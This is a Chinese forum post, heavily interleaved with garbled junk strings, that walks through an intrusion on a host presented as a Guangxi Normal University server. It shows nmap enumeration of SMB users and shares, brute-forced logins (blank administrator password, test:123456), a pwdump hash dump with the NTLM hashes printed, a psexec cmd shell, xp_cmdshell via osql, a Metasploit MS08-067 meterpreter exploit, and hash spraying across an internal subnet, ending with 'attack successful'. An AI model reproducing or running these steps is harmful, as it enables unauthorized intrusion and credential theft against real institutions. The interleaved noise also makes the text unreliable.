广西师范网站http://202.103.242.241/) {5 `% ^* F& Q) J& T5 E$ Q
, \; u6 S3 f \" J
root@bt:~# nmap -sS -sV 202.103.242.241( U' e1 B) \/ E. m+ v% y0 I% o
2 H$ Z& `2 }) L# V* sStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST- m9 r/ {4 l$ N
# b' C5 {, P7 l% C) O
Nmap scan report for bogon (202.103.242.241)
( W4 D: p0 \+ w
8 J. G* h! w @9 ]* xHost is up (0.00048s latency).
$ H. B9 D' A! M, X* \. l( d4 f6 N) ?# S% I& E
Not shown: 993 closed ports
& \/ y9 F0 F! a* W; \' j. l# R3 M5 W+ w8 |, B( L/ a
PORT STATE SERVICE VERSION' ]. \' D3 Z. ~6 Z: Q4 k
* ^0 I& N/ F' ]7 _$ }+ m135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)( [3 Z8 M; _; E2 p% E% P
) }1 E2 o+ e9 a! Z5 j& q+ O139/tcp open netbios-ssn2 Y4 L7 \1 ^& X( @( L
9 s! m5 Q5 j% R( P& Q445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
8 g$ a/ i3 o7 L* B, O3 w1 f
4 D0 m- X$ E; y" i: h1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
1 ^0 |4 |6 c* G
6 I# M& O) F; l$ D* D, x3 T1026/tcp open msrpc Microsoft Windows RPC* s: g+ s9 l; I n
& d+ Y+ O+ r w. \6 J- r3372/tcp open msdtc?
- U0 q7 I: z' i' k6 `, }; ~# T5 m- P3 z
3389/tcp open ms-term-serv?
$ q7 P8 `* c* \2 W
7 K% M6 R# l& ]4 f& I1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :! B2 J5 ^& b4 b. i# k
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r& }. z: [' Y; j6 R5 O* B0 P! r
7 E1 A" _1 ] b( }- h
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions- Z+ P8 N0 N6 p3 Z
6 I; |: h- e% s9 q$ O, ^4 N
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)% }9 q; i8 D {7 o% P; F
3 h- E' T* k! v( uSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO7 d' o5 W" f& f0 Z
* g: `$ r& L# Z7 F9 u5 \
SF:ptions,6,”hO\n\x000Z”);
2 t% [- e, u& X; o& L2 X( t, K2 T( a- q# ~; ?) J$ N
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)4 [. _2 p E* L8 j$ x! u! T; @
0 v5 Y7 I* U1 r- l6 u7 q
Service Info: OS: Windows
6 ]) A2 I9 Z9 I3 n D
7 I6 F' m3 B8 u& kService detection performed. Please report any incorrect results at http://nmap.org/submit/ .% h$ D# I y& u9 G$ H: u/ ~
2 ~5 I8 g8 n( A- _0 XNmap done: 1 IP address (1 host up) scanned in 79.12 seconds1 G# S5 L! m1 t, b/ U5 i/ q& B' x
% w. _8 w9 ^0 r; x% d# q
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
8 x3 B5 H+ b4 H" V3 X' ] X4 U6 v
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
# q2 a3 h5 ~# T8 q! M
& H! w% M9 f1 n" h! Y-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse' U( h+ u6 S$ J3 y- |) y
+ P& Y- X6 G3 d) z. T-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse3 H( A3 t1 b5 \4 N7 L6 c/ ^" s
4 {& p; x$ j' U! j, E" x) l-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse$ B8 I z2 @7 F" Z/ `1 b& j5 I- C7 W
; ~* P" `) g+ K0 F
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse: S, b. V9 C# r. g4 c3 x
9 G% Z7 i$ \0 A9 e4 Q-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse. Y0 v N) E+ M: `$ L5 t7 d
6 C+ f& x0 n" d
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
2 @% y: @9 n2 I$ Z
$ i6 E( B8 o0 G; v/ A( y-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
, J: }4 i& ^3 g G; N7 k1 f0 W( |; ]9 ?4 g g" Y+ O2 O* Z4 h
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
5 i0 y# k; y9 s/ ?2 \6 d0 F' X7 S' E
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse$ c4 u6 E9 `! l U1 t j+ {
* i3 u) o6 j* C) u-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
8 J! p+ b4 q2 h2 J- O) A: e" G0 M5 _' l: P* L$ T( s
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
! }1 v% a# s9 X! p1 ]* ?* a7 T; P; T% L! h8 G: c& V2 c, ~. r
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse5 I6 B9 d: u' {, G4 b
9 N* I: b5 p, [: P% ]' l) v
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse1 J+ r, ^+ I: }9 q( L
; t/ P0 G0 |5 {9 g1 z! Z G
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
6 ]5 @& T/ u) y; [3 D, I- c) Y" e, W0 h/ d$ s2 T4 U& y
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 : _* o# r+ }; o2 x" k- `* ?
, Q/ A" d9 x* I1 M7 `! d- @" T6 W+ T//此乃使用脚本扫描远程机器所存在的账户名
% ]1 | K5 u; a7 u' k7 B' t; l1 X
5 D3 v# }0 j8 q/ X. ^9 i1 E) sStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
$ o3 F; K( C# @- R; K
' A# o3 F5 X/ {1 \2 ~0 w# U: a/ tNmap scan report for bogon (202.103.242.241)
' ]/ B( s1 k7 A
& \4 Z/ f8 u' c+ X7 p' t: t& Q( wHost is up (0.00038s latency)., u. E5 g4 J* _% B
; q' P! b1 e/ i( PNot shown: 993 closed ports: R4 u/ x8 m3 a) s0 O! w
! }: L3 \6 L- k6 I8 U. J9 w
PORT STATE SERVICE$ v, U+ O j, {2 Y5 s
, I' `: \! m2 z; e
135/tcp open msrpc
( ^0 `/ u/ E2 k" X
5 g9 v: q# h4 s1 {3 H6 v2 c! z' Y139/tcp open netbios-ssn a- R! M( ^' i
( E% g7 T: }( R- Y# k445/tcp open microsoft-ds
, g' @! \8 C# Q5 _" o. ^% c; L' t, k$ Y: N* X% Q
1025/tcp open NFS-or-IIS
. G+ }) B1 m9 t9 X4 F3 j( I! e S3 O: K: f, ?+ [
1026/tcp open LSA-or-nterm
+ o* g, [/ r/ p& k& h, [$ l6 j4 \' Z
3372/tcp open msdtc
1 O% ?' L4 O( O( [8 c3 z* f) `0 Z8 @. F7 F1 _) O+ _# D" M% d& S8 v" \
3389/tcp open ms-term-serv; r8 T! G5 `# G& X6 F
0 I# A+ ~8 t9 z9 _MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# x* k5 H8 ^2 T
9 S) N$ O- f* B! v0 S. t P" z; b+ VHost script results:( p, a6 _+ k$ O( s8 V
2 Y: n5 D6 j6 _' B8 E3 |' F
| smb-enum-users:
% r! Z2 @, z7 |
( G( \6 L* e/ G- X# e1 s6 z/ @|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果4 Y( \ F9 F' W
" \ M0 c# I% l7 x( [0 t
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds2 J( m* `. L( x. B, S
" E& ^7 k3 C) h" ~8 R0 f' f `7 H i! Vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 , ?& V% `$ {1 K0 Y i% u; f$ U
7 f* d) O, K/ z5 r//查看共享
& u2 u2 g5 c5 ?/ h$ m, i% B+ N3 h" W5 x/ G7 Z, r& p& m, L/ W
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST% C. {: m+ s2 |
* e+ V9 d0 Y. t3 V x- O$ J( nNmap scan report for bogon (202.103.242.241)
+ B4 p, @3 G& D8 |2 \* ]# m) x; A3 K$ \" k
Host is up (0.00035s latency).8 b4 K& ^) I6 ^
$ [6 O$ X# V+ l* d& v% F$ p: j9 \, _+ ?
Not shown: 993 closed ports
6 F, O. B3 }" L2 g" V. G' Z9 l3 `# W# y+ p6 W8 b
PORT STATE SERVICE" \9 x: a) }3 n0 O5 g# j3 b
: F3 S4 A! h; R1 }1 Z
135/tcp open msrpc8 e3 T/ u+ n9 o1 W6 z2 ?5 c
! i# T3 k5 Q# ~5 X
139/tcp open netbios-ssn8 u( C7 L& j) r$ C, Q- c; Q/ c# K0 |
; m- T) E: [9 T6 U
445/tcp open microsoft-ds
1 ~- Z, J- u' p& |
$ |( G6 f" G' X9 Q: O1025/tcp open NFS-or-IIS
" }1 Y' T1 t' A. C+ F7 [
) W6 L2 y9 l; m/ x' g7 _8 P# v1026/tcp open LSA-or-nterm$ f: {7 W: a8 ~2 g
9 K C! e( P) a& }/ v3 h
3372/tcp open msdtc
; O+ c( L6 @( U
: k: F) ?6 ~4 m2 u* C7 K. y: b+ O3389/tcp open ms-term-serv
" |4 M5 L# p. ?$ N- _0 _" C" L, C/ u4 H
) I! N; M' A. M3 W3 M% B; e/ k$ \1 wMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
* |: h/ F. A: G. I6 F0 ^% u0 r5 D/ J* X3 K8 D! Z
Host script results:
" o- c2 Q5 S, ~$ N4 }, O9 ^$ Y% C: w3 ~( v; v
| smb-enum-shares:
; U u8 K7 _9 x4 ^1 m- l
# C6 H9 {# J/ k) B' S* g% N6 r| ADMIN$" S6 h7 m5 u$ M8 }! P$ ]1 W8 [
( J- ? S, z' p0 U0 L$ s| Anonymous access: <none>
/ r. R* o' `4 z0 G4 v& t- q1 ^1 H6 w* O7 [ D
| C$( j0 @- T! R2 y" e/ X1 G4 j
7 p2 \9 {! k" {| Anonymous access: <none>3 [; A! g, m- d6 k. w
0 w |/ j" b& }, `| IPC$" i1 J* O& y+ J" g
# ]* e. R6 f" g3 Y
|_ Anonymous access: READ# W N2 C1 j* E* o( A. h) Z9 J" x! B
5 R7 T( M+ j' L. y) PNmap done: 1 IP address (1 host up) scanned in 1.05 seconds+ m3 m, u: t7 ?/ U, ]3 g
$ C0 u+ m: V: j- Croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
s/ b; |" f+ u" h" C+ Z
" Z, H* f3 N: e( E2 |" O3 I" O4 G$ R//获取用户密码
1 {: c X$ o9 l5 y# h9 H6 j( B$ O" U. l0 a8 [' _
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST% U- p5 {2 w2 d) `& x3 q" r I
1 h# X. w/ F6 j
Nmap scan report for bogon (202.103.242.2418)
' a2 g A$ K4 a, J' i* R0 W: j/ b5 a, ?& z; r$ h8 W) i
Host is up (0.00041s latency).1 N& L2 e0 S3 y$ t! w; H7 i
3 p! o7 T' ^0 p- N& T9 X& {- O- B
Not shown: 993 closed ports
' m" ]& L) |, T0 ~
. j- s: i" L, T! M8 MPORT STATE SERVICE
* ?' t+ S3 g; L: T! I( h6 R
# J% t' c% e9 V3 w. Y7 L ]135/tcp open msrpc1 g" J9 ?+ e+ n
- P1 V1 L4 }+ S! L) @! n' d# |& X& a139/tcp open netbios-ssn
( B4 P) q2 m5 K, U1 A ^ g# m+ e7 |
445/tcp open microsoft-ds, ^1 c6 |5 E2 x+ h* y* N
) o, X5 H. s, B B* v1025/tcp open NFS-or-IIS+ l6 B8 ^& u3 e/ V: }
" W+ _4 {3 C. I7 T
1026/tcp open LSA-or-nterm7 i- I2 t3 ^% j' _) Y* [0 R
9 Y: |$ L' E# e# L3372/tcp open msdtc
" J& J+ f5 X8 x
; E x0 u" Z- H" L4 I% f. a1 @3389/tcp open ms-term-serv7 g8 M4 v# K1 _! d% r
1 M& J5 f* P2 k& qMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- u; ^. H' y- L9 I, \$ O# C! t# U. q! T \& \
Host script results:% O6 o% W! M) [6 k- E e
; k' p" d5 J, K1 C
| smb-brute:
3 C: H1 {$ s( {3 _- w: H, }
. [* Q5 v: E' N6 H- K8 O( X+ ]# @administrator:<blank> => Login was successful
& m! e! V+ ?/ C6 V0 M* Y$ n! K
) D! E5 _' J( @0 ^. I h. c/ `" ]; t|_ test:123456 => Login was successful
/ Q. V/ v' x+ y) j' g% ?6 N$ y+ n
, r/ f% Y f/ |Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds' {: U* b# Q6 v
5 _9 e6 _8 z! B1 [' h5 [root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash1 @* J6 E; K5 H x1 b! f/ |& d5 B
6 O* I) t$ w9 y) `8 ~; jroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data: i& c% ?, v( S+ A0 T
. ^9 ?3 G$ L! O, L2 D
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse# @) x' R* V* ]7 @1 d& M
, {. l4 e4 j% o* g3 N$ d" y% p3 e
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139; u m0 u5 \: i! s4 W; S
' ^) _$ L0 u5 XStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST" x/ L+ Q5 _' L! Z
' c0 ^; M* W, m- ^* s* `& z
Nmap scan report for bogon (202.103.242.241)3 u. s$ u8 s0 `
; I, R3 o6 x3 V) A0 Y6 X% Q1 m' B6 XHost is up (0.0012s latency).
5 Y2 j6 R8 U: D9 a" v
, U* S" ~3 B2 _; d, U; ]9 iPORT STATE SERVICE: k; U' g' a3 j. Z$ p; ^
# d( C7 h' w; i9 _1 i* A135/tcp open msrpc
1 y# @6 b' z* J- k% Q a' ^/ C% e! o5 M8 S, d1 \
139/tcp open netbios-ssn
2 \0 v- c- {) Y2 _/ Q; }7 F& a2 N# w1 b( P5 U6 q9 d4 U w$ C
445/tcp open microsoft-ds1 T8 y/ U1 i- }. y& |" N
. H I0 f% J! [, [' g; Q# H1 g \5 ]# iMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
/ y" F' s! w+ j/ f! k
' R% B; U, e O- gHost script results:
, p' M( ?& i/ n) L; C8 A9 W6 }$ d4 _
- O2 C0 }# f$ Q- q' ^9 b& z7 \4 i' ?| smb-pwdump:
: ^6 | w H; i& g, S
. S6 _2 K6 Q- D) i* S# A| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************8 N5 ?- K* U" \1 d8 e! e+ q
5 E1 W& H3 Q( l, M. ^
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************% q- ^' J3 o. t
% X: p/ M+ y$ h/ _
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4& g; b/ ]7 f' ~/ k7 Z$ X
8 _7 M4 O, K6 r$ M
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D27 e5 h! A7 ~6 Z" c2 o
. N& ~0 B1 W/ @7 ^2 D( `( d
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
# B( y( {7 Y+ [* X* S
, E; X! G6 H- c, nC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell z5 ~/ d4 O! k' J0 c
, z- O6 d; ~" G/ O f/ r `
-p 123456 -e cmd.exe
3 A, o9 j9 {& w, @' M6 r$ I3 a1 a9 j) Q0 U1 W* r" u
PsExec v1.55 – Execute processes remotely, O" | Y$ _4 ]3 L
1 t, T2 K& H, D! g
Copyright (C) 2001-2004 Mark Russinovich p" |) `# o( @: W' W5 p
+ `4 Y3 X6 A$ w6 u- {' k* l- o
Sysinternals – www.sysinternals.com
c' u0 Y* z) P) A6 V" H# \" X' _" B, E" _- D
Microsoft Windows 2000 [Version 5.00.2195]' [3 N- f, H1 ]: f' h
`; ?$ Z1 e3 U7 F& I+ R5 ]; m1 e(C) 版权所有 1985-2000 Microsoft Corp.
0 v2 I- ?+ y2 }) t
% g2 ^: k- |9 E* y3 E/ `# _C:\WINNT\system32>ipconfig' H# s/ ^( W0 Y0 s
: i- I$ `: H; O! K3 S. MWindows 2000 IP Configuration2 L3 M! U0 \1 u$ ^
1 u7 C5 p, i" v1 Q. s8 `
Ethernet adapter 本地连接:
6 o+ E) @$ m8 }% z j `7 S& r$ U, I9 S' E! Q4 Q
Connection-specific DNS Suffix . :. w9 r8 |3 J* e, @* g* Z
+ S5 R7 S- \0 k hIP Address. . . . . . . . . . . . : 202.103.242.241
1 G5 Z7 g% c% s, U
5 }7 H6 u( u" n- Q8 BSubnet Mask . . . . . . . . . . . : 255.255.255.0
/ Y5 D# }( ]+ S2 [& B* b0 [4 Z7 N7 D; h5 s9 g7 d. X
Default Gateway . . . . . . . . . : 202.103.1.1) Z7 A: I/ R: _$ ^& ?/ U
2 L) [0 w! m7 P; ~3 y$ x) |. S
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
3 `/ s+ m4 S& \
% W2 b% D$ Q/ d5 H& m$ q" ~root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
. n9 I2 ?- y+ v5 s1 v1 K! E' l' T. \
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST$ F* C, ?$ [; o
1 A, X+ j2 p1 T3 S8 `) s1 e
Nmap scan report for bogon (202.103.242.241)
# l" F5 k' [- t" D! l/ B4 @( @- X2 }+ ^; ~7 S' h
Host is up (0.00046s latency).
4 c; D& [5 d/ O# l/ N+ z1 a+ M' j# B7 i7 h! ~7 Y# r1 _
Not shown: 993 closed ports
) z" {. r- H2 i8 w) x8 s2 x
6 ~: y3 {$ F" z- e$ v. TPORT STATE SERVICE
2 T5 z! d& U' j
% F4 G3 h1 f6 Z135/tcp open msrpc
7 o2 v2 U% R5 q5 Z+ r
# ^. l! d. X( {7 t2 I0 c139/tcp open netbios-ssn' y! N7 K% V$ ?4 i$ v) I& B+ N2 u
/ i) R) y" r# _. u445/tcp open microsoft-ds
3 x: q0 }7 z1 Y' n3 |) F' ?
' s' ^. K% Z1 Q/ ~) w1025/tcp open NFS-or-IIS( W* t \4 R: @: V& b
' H: `0 O4 g+ t. v2 W1026/tcp open LSA-or-nterm; V7 i3 o$ |: W: R# A$ s8 T( R
7 P* t* @9 ~% U1 b/ ?- P
3372/tcp open msdtc5 J' I' d5 U, `4 H9 q- D: D9 p
/ E8 l( G; o) m4 B* ?
3389/tcp open ms-term-serv5 x/ \2 t y! g# S% f: [& Z
; c7 p; H' c6 ]+ G& U5 ^. gMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
$ [) r( L/ V- B1 a( T9 E/ r7 Y A2 K z. z3 Q& n C& I
Host script results:
( L+ r3 m9 t; Q p3 Z* N2 Y( U* _1 S; Y. T+ K" L
| smb-check-vulns:$ I: u* ?0 l4 o) z1 S- b
' t+ r. O) [7 Q|_ MS08-067: VULNERABLE9 Y2 h0 I+ d" f$ ?+ J
) P9 \- ~9 i' o
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
" f" K, W2 q. h7 L6 O9 X; g" U% X1 C7 Y ?( G* h' a; r0 t0 Y
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
- ] d8 t0 `/ }# Z, J7 T6 V
! b& k6 q0 I, S/ _/ Mmsf > search ms08 n: l0 _/ V$ w9 `
# [. f B$ Q2 C% A
msf > use exploit/windows/smb/ms08_067_netapi' t7 y* @$ k4 N1 K& m! q5 x
/ U: F8 a+ @- z u) c- g) Tmsf exploit(ms08_067_netapi) > show options2 q3 P7 W! D; V5 j
5 {( ?8 J) V* G' y* D
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241# X; j* S. l; c) h
n# z! y; J5 F2 p% z0 U
msf exploit(ms08_067_netapi) > show payloads
a _ G# e r# U, q* m b) h
4 N, |8 T+ ^$ a5 k3 cmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp! V6 Y2 X9 |: k% i# V4 a2 C$ N/ z
( O7 f- I9 v3 C8 Mmsf exploit(ms08_067_netapi) > exploit
) ?: H5 ]$ H; |6 v, k0 P8 a
! w$ N, H% b" I- Ymeterpreter >
& T: _/ S2 w' \; p9 k& a( S' q: \) i. k/ ?/ }
Background session 2? [y/N] (ctrl+z)* L2 t6 x: ^4 [5 n
j! \% z F' {/ K& S4 ]' l3 e
msf exploit(ms08_067_netapi) > sessions -l$ G0 Q Y" p; A) b* y7 [( M
& }4 D) j3 E7 C0 Zroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
" T: d% s F4 @1 L" I9 |3 V* Z
$ \ z5 ^! f: X+ Ftest
3 U# l) R+ t6 W1 F. R% q, n' ?$ L0 i; {1 w/ k/ \8 P
administrator
& T/ j9 z3 m3 f. z+ D. y! i
, `3 ^' D, u) e( D# F5 n+ Aroot@bt:/usr/local/share/nmap/scripts# vim password.txt/ B. _7 ^" i# `+ x5 x4 | {# @2 C
. a y; x9 ~) P; P
44EFCE164AB921CAAAD3B435B51404EE& Q( v4 q) {& J; u
( w' c6 T5 c5 V# c: ?" D& r* K# Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
0 r4 N# K" f* F: e+ B
$ K6 g" Q, ]+ O8 Y, L* s //利用用户名跟获取的hash尝试对整段内网进行登录# x# n+ a0 W7 Y- o
2 g7 ]* ]; h* U9 j3 Y2 y: f
Nmap scan report for 192.168.1.105$ w7 j; y) ^" T* f; @
: n8 g+ O3 j6 l6 x4 }Host is up (0.00088s latency).# n- s7 J5 B& Y
$ Y% ]2 k# ^- T) v" M% wNot shown: 993 closed ports
( C2 k% g0 _7 A# r# }" h. e- G7 g$ ]1 C: o4 j5 _
PORT STATE SERVICE
7 t9 ]: A, |5 q! i
/ F# A8 G- p' h1 `3 x/ B1 L+ t# R135/tcp open msrpc7 j; L. x v, l
# G( |, k" O+ L% s" f2 e139/tcp open netbios-ssn
+ d0 p3 t( {$ Y' g9 B, a. S
8 v6 f5 L( F! ^- Z445/tcp open microsoft-ds
- z5 H5 z6 X6 G; M6 p6 o. v1 A5 Q# [1 x# t `+ S
1025/tcp open NFS-or-IIS- F8 G9 E r9 _2 ~$ y/ \! s6 ~
1 J% E* s6 L+ \6 k3 ]5 [# |8 R1026/tcp open LSA-or-nterm
$ S! e. a. z2 @9 L6 v& _ |# |. E e7 d3 {( i( a4 G
3372/tcp open msdtc) A+ g: u& I0 P2 I4 c6 |, U/ A
! A2 Q/ _( z( u( z: f b! {/ S4 U2 ~3389/tcp open ms-term-serv
4 o) L* E2 O# u: C
k1 P# U" C# ]' G/ XMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# Z; D9 Z2 f6 v; ?. h
, M/ G ?# H& x( u DHost script results:
% T( ~" F9 {7 C6 F- W7 @' s+ U6 C6 W% M2 I
| smb-brute:
8 l( A+ p0 V6 V! z7 k1 l# _1 J, l+ z4 b! [2 b; m
|_ administrator:<blank> => Login was successful8 \8 ^0 \- z8 s% |) ^- r4 K
0 t( }- k% j. l9 R" \攻击成功,一个简单的msf+nmap攻击~~·
8 R: J* M3 q, S) r/ y2 B# V) [8 L P
|
发表于 2012-12-4 12:46:42
收藏
支持
反对